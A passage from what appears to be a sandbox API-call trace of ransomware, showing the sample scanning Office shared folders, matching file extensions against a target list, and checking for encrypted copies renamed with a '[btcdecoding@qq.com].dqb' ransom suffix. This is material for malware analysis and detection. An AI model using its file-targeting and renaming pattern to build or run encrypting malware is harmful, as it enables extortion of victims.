(lpString=".docx") returned 5 [0041.261] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0041.261] lstrlenW (lpString=".pdf") returned 4 [0041.261] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0041.261] lstrlenW (lpString=".xls") returned 4 [0041.261] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString=".xlsx") returned 5 [0041.262] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0041.262] lstrlenW (lpString=".ppt") returned 4 [0041.262] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.262] lstrlenW (lpString=".zip") returned 4 [0041.262] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString=".rar") returned 4 [0041.262] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString=".bz2") returned 4 [0041.262] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0041.262] lstrlenW (lpString=".7z") returned 3 [0041.262] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.262] lstrlenW (lpString=".dbf") returned 4 [0041.262] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.262] lstrlenW (lpString=".1cd") returned 4 [0041.262] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.262] lstrlenW (lpString=".jpg") returned 4 [0041.262] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.262] lstrlenW (lpString=".doc") returned 4 [0041.262] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString=".docx") returned 5 [0041.262] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0041.262] lstrlenW (lpString=".pdf") returned 4 [0041.262] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString=".xls") returned 4 [0041.262] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0041.262] lstrlenW (lpString=".xlsx") returned 5 [0041.262] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0041.262] lstrlenW (lpString=".ppt") returned 4 [0041.262] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0041.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.263] lstrlenW (lpString=".zip") returned 4 [0041.263] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0041.263] lstrlenW (lpString=".rar") returned 4 [0041.263] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0041.263] lstrlenW (lpString=".bz2") returned 4 [0041.263] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0041.263] lstrlenW (lpString=".7z") returned 3 [0041.263] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0041.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.263] lstrlenW (lpString=".dbf") returned 4 [0041.263] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0041.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.263] lstrlenW (lpString=".1cd") returned 4 [0041.263] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0041.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.263] lstrlenW (lpString=".jpg") returned 4 [0041.263] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0041.263] lstrcmpiW (lpString1=".htm", lpString2=".dqb") returned 1 [0041.263] lstrlenW (lpString="Bears.htm") returned 9 [0041.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.265] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=255) returned 1 [0041.265] CloseHandle (hObject=0x208) returned 1 [0041.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20 [0041.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.265] lstrlenW (lpString=".doc") returned 4 [0041.265] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.265] lstrlenW (lpString=".docx") returned 5 [0041.265] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0041.265] lstrlenW (lpString=".pdf") returned 4 [0041.265] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.265] lstrlenW (lpString=".xls") returned 4 [0041.265] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.265] lstrlenW (lpString=".xlsx") returned 5 [0041.265] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0041.265] lstrlenW (lpString=".ppt") returned 4 [0041.265] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.265] lstrlenW (lpString=".zip") returned 4 [0041.265] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.265] lstrlenW (lpString=".rar") returned 4 [0041.265] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.265] lstrlenW (lpString=".bz2") returned 4 [0041.265] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.265] lstrlenW (lpString=".7z") returned 3 [0041.266] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString=".dbf") returned 4 [0041.266] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString=".1cd") returned 4 [0041.266] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString=".jpg") returned 4 [0041.266] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString=".doc") returned 4 [0041.266] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0041.266] lstrlenW (lpString=".docx") returned 5 [0041.266] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0041.266] lstrlenW (lpString=".pdf") returned 4 [0041.266] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0041.266] lstrlenW (lpString=".xls") returned 4 [0041.266] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0041.266] lstrlenW (lpString=".xlsx") returned 5 [0041.266] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0041.266] lstrlenW (lpString=".ppt") returned 4 [0041.266] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString=".zip") returned 4 [0041.266] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0041.266] lstrlenW (lpString=".rar") returned 4 [0041.266] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0041.266] lstrlenW (lpString=".bz2") returned 4 [0041.266] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0041.266] lstrlenW (lpString=".7z") returned 3 [0041.266] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString=".dbf") returned 4 [0041.266] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0041.266] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.266] lstrlenW (lpString=".1cd") returned 4 [0041.267] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0041.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0041.267] lstrlenW (lpString=".jpg") returned 4 [0041.267] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0041.267] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0041.267] lstrlenW (lpString="Bears.jpg") returned 9 [0041.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.267] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1074) returned 1 [0041.267] CloseHandle (hObject=0x208) returned 1 [0041.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20 [0041.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.267] lstrlenW (lpString=".doc") returned 4 [0041.267] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.267] lstrlenW (lpString=".docx") returned 5 [0041.267] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0041.267] lstrlenW (lpString=".pdf") returned 4 [0041.267] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.268] lstrlenW (lpString=".xls") returned 4 [0041.268] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.268] lstrlenW (lpString=".xlsx") returned 5 [0041.268] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0041.268] lstrlenW (lpString=".ppt") returned 4 [0041.268] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.268] lstrlenW (lpString=".zip") returned 4 [0041.268] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.268] lstrlenW (lpString=".rar") returned 4 [0041.268] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.268] lstrlenW (lpString=".bz2") returned 4 [0041.268] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.268] lstrlenW (lpString=".7z") returned 3 [0041.268] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.268] lstrlenW (lpString=".dbf") returned 4 [0041.268] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.268] lstrlenW (lpString=".1cd") returned 4 [0041.268] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.268] lstrlenW (lpString=".jpg") returned 4 [0041.268] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.268] lstrlenW (lpString=".doc") returned 4 [0041.268] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.268] lstrlenW (lpString=".docx") returned 5 [0041.268] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0041.268] lstrlenW (lpString=".pdf") returned 4 [0041.268] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.268] lstrlenW (lpString=".xls") returned 4 [0041.268] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.268] lstrlenW (lpString=".xlsx") returned 5 [0041.268] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0041.268] lstrlenW (lpString=".ppt") returned 4 [0041.269] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.269] lstrlenW (lpString=".zip") returned 4 [0041.269] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.269] lstrlenW (lpString=".rar") returned 4 [0041.269] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.269] lstrlenW (lpString=".bz2") returned 4 [0041.269] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.269] lstrlenW (lpString=".7z") returned 3 [0041.269] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.269] lstrlenW (lpString=".dbf") returned 4 [0041.269] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.269] lstrlenW (lpString=".1cd") returned 4 [0041.269] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0041.269] lstrlenW (lpString=".jpg") returned 4 [0041.269] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.269] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0041.269] lstrlenW (lpString="Blue_Gradient.jpg") returned 17 [0041.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.270] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2575) returned 1 [0041.270] CloseHandle (hObject=0x208) returned 1 [0041.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0x20 [0041.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.270] lstrlenW (lpString=".doc") returned 4 [0041.270] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.271] lstrlenW (lpString=".docx") returned 5 [0041.271] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0041.271] lstrlenW (lpString=".pdf") returned 4 [0041.271] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.271] lstrlenW (lpString=".xls") returned 4 [0041.271] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.271] lstrlenW (lpString=".xlsx") returned 5 [0041.271] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0041.271] lstrlenW (lpString=".ppt") returned 4 [0041.271] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.271] lstrlenW (lpString=".zip") returned 4 [0041.271] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.271] lstrlenW (lpString=".rar") returned 4 [0041.271] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.271] lstrlenW (lpString=".bz2") returned 4 [0041.271] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.271] lstrlenW (lpString=".7z") returned 3 [0041.271] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.271] lstrlenW (lpString=".dbf") returned 4 [0041.271] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.271] lstrlenW (lpString=".1cd") returned 4 [0041.271] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.271] lstrlenW (lpString=".jpg") returned 4 [0041.271] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.271] lstrlenW (lpString=".doc") returned 4 [0041.271] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0041.271] lstrlenW (lpString=".docx") returned 5 [0041.271] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0041.271] lstrlenW (lpString=".pdf") returned 4 [0041.271] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0041.271] lstrlenW (lpString=".xls") returned 4 [0041.272] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0041.272] lstrlenW (lpString=".xlsx") returned 5 [0041.272] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0041.272] lstrlenW (lpString=".ppt") returned 4 [0041.272] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0041.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.272] lstrlenW (lpString=".zip") returned 4 [0041.272] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0041.272] lstrlenW (lpString=".rar") returned 4 [0041.272] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0041.272] lstrlenW (lpString=".bz2") returned 4 [0041.272] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0041.272] lstrlenW (lpString=".7z") returned 3 [0041.272] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0041.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.272] lstrlenW (lpString=".dbf") returned 4 [0041.272] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0041.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.272] lstrlenW (lpString=".1cd") returned 4 [0041.272] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0041.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0041.272] lstrlenW (lpString=".jpg") returned 4 [0041.272] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0041.272] lstrcmpiW (lpString1=".gif", lpString2=".dqb") returned 1 [0041.272] lstrlenW (lpString="Cave_Drawings.gif") returned 17 [0041.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.272] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=4587) returned 1 [0041.273] CloseHandle (hObject=0x208) returned 1 [0041.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0x20 [0041.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.273] lstrlenW (lpString=".doc") returned 4 [0041.273] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.273] lstrlenW (lpString=".docx") returned 5 [0041.273] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0041.273] lstrlenW (lpString=".pdf") returned 4 [0041.273] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.273] lstrlenW (lpString=".xls") returned 4 [0041.273] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.273] lstrlenW (lpString=".xlsx") returned 5 [0041.273] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0041.273] lstrlenW (lpString=".ppt") returned 4 [0041.273] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.273] lstrlenW (lpString=".zip") returned 4 [0041.273] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0041.273] lstrlenW (lpString=".rar") returned 4 [0041.273] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0041.273] lstrlenW (lpString=".bz2") returned 4 [0041.273] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0041.273] lstrlenW (lpString=".7z") returned 3 [0041.273] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0041.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.273] lstrlenW (lpString=".dbf") returned 4 [0041.273] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW (lpString=".1cd") returned 4 [0041.274] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW (lpString=".jpg") returned 4 [0041.274] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW (lpString=".doc") returned 4 [0041.274] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0041.274] lstrlenW (lpString=".docx") returned 5 [0041.274] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0041.274] lstrlenW (lpString=".pdf") returned 4 [0041.274] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0041.274] lstrlenW (lpString=".xls") returned 4 [0041.274] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0041.274] lstrlenW (lpString=".xlsx") returned 5 [0041.274] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0041.274] lstrlenW (lpString=".ppt") returned 4 [0041.274] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0041.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0041.274] lstrlenW 